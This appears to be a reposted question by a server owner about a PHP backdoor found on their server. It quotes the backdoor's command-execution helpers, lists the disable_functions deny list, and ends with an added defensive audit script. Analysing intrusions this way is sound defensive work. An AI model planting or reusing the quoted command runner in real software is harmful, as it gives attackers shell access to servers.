Sunday, March 20, 2016

linux - Php functions are disabled, but somehow they can be executed

I had a problem on my server today and discovered malicious code which is used to give an attacker access to my system.
I downloaded that PHP script, but what was weird is that I saw functions in it which are disabled in my PHP configuration.

Disabled are: passthru, exec, shell_exec, system... among others

How is that possible?

This is part of the code:

function get_execution_method()
{
    if(function_exists('passthru')){ $m = "passthru"; }
    if(function_exists('exec')){ $m = "exec"; }
    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
    if(function_exists('system')){ $m = "system"; }
    if(!isset($m)) //No method found :-|
    {
        $m = "Disabled";
    }

    return($m);
}

function execute_command($method,$command)
{
    if($method == "passthru")
    {
        passthru($command);
    }
    elseif($method == "exec")
    {
        exec($command,$result);
        foreach($result as $output)
        {
            print $output."\n";
        }
    }
    elseif($method == "shell_exec")
    {
        print shell_exec($command);
    }
    elseif($method == "system")
    {
        system($command);
    }
}

function perm($file)
{
    if(file_exists($file))
    {
        return substr(sprintf('%o', fileperms($file)), -4);
    }
    else
    {
        return "????";
    }
}

Just to be sure that there are no leftovers, I copied that script to a new account which no one has access to except me. There is no .htaccess file or php.ini. The script still works on that account. I created a phpinfo file to see the PHP configuration for that account, and here are the disabled functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen

As you can see, the functions used in that script are in the list of disabled functions.

When I try to run some of the disabled functions I get this message:

Warning: system() has been disabled for security reasons in /home/user....

Just to make sure, I uploaded that script to a different server and the same was possible. That server also has the same disabled functions.

How can I prevent this from allowing someone access to my files?
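An audit script for the account in question, added here as an illustration and not part of the original post or of any answer to it. It relies on two facts about PHP: disable_functions is a PHP_INI_SYSTEM setting, so it can only come from php.ini or the web server's main configuration (never from ini_set(), .htaccess or .user.ini, which is why the fresh account inherits it); and before PHP 8.0 function_exists() still returns true for a disabled function, so the quoted get_execution_method() happily selects "passthru" or "system" and only fails with the "has been disabled for security reasons" warning at call time (from PHP 8.0 on, disabled functions are treated as undeclared and function_exists() returns false). The list of probed functions is my own choice, taken from the quoted script and the phpinfo output above; run it through the same SAPI the attacker's script used (as a web request, not the CLI), because CLI php may load a different php.ini.

```php
<?php
// Added audit example (not code from the original post). Compares what
// disable_functions actually contains with what function_exists() claims,
// for the command-execution functions the quoted script probes for.

// Functions the quoted script and the phpinfo() list above care about
// (my selection for this example).
$probe = ['passthru', 'exec', 'shell_exec', 'system', 'proc_open', 'popen'];

// Parse the effective disable_functions value for this SAPI.
// disable_functions is PHP_INI_SYSTEM, so this reflects php.ini / httpd.conf
// only; nothing in the account itself can change it.
function disabled_functions(): array
{
    $raw = (string) ini_get('disable_functions');
    $list = array_map('trim', explode(',', $raw));
    return array_values(array_filter($list, 'strlen'));
}

// True if the function is listed in disable_functions.
function is_really_disabled(string $fn, array $disabled): bool
{
    return in_array($fn, $disabled, true);
}

// Build one report line per probed function. The interesting case is
// exists=true together with disabled=yes: that is the PHP < 8 behaviour
// the quoted script trips over (it picks the method, the call then fails).
function audit(array $probe, array $disabled): array
{
    $rows = [];
    foreach ($probe as $fn) {
        $exists   = function_exists($fn);
        $disabled_now = is_really_disabled($fn, $disabled);
        $note = '';
        if ($exists && $disabled_now) {
            $note = 'function_exists() misleads (PHP < 8); call will emit the "disabled for security reasons" warning';
        } elseif (!$exists && $disabled_now) {
            $note = 'PHP 8+ behaviour: disabled function reported as non-existent';
        } elseif (!$disabled_now) {
            $note = 'NOT in disable_functions for this SAPI: really callable';
        }
        $rows[] = [$fn, $exists, $disabled_now, $note];
    }
    return $rows;
}

$disabled = disabled_functions();
printf("PHP %s (%s), disable_functions has %d entries\n", PHP_VERSION, PHP_SAPI, count($disabled));
printf("%-10s %-7s %-9s %s\n", 'function', 'exists', 'disabled', 'note');
foreach (audit($probe, $disabled) as [$fn, $exists, $disabled_now, $note]) {
    printf("%-10s %-7s %-9s %s\n",
        $fn,
        $exists ? 'true' : 'false',
        $disabled_now ? 'yes' : 'no',
        $note);
}
```

If every probed function shows disabled=yes, the quoted helper cannot execute commands through any of them on that server, and whatever the script actually achieved came from a code path outside the fragment shown; if any shows disabled=no under the web SAPI, that is the gap to close in php.ini (the only place disable_functions can be set).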
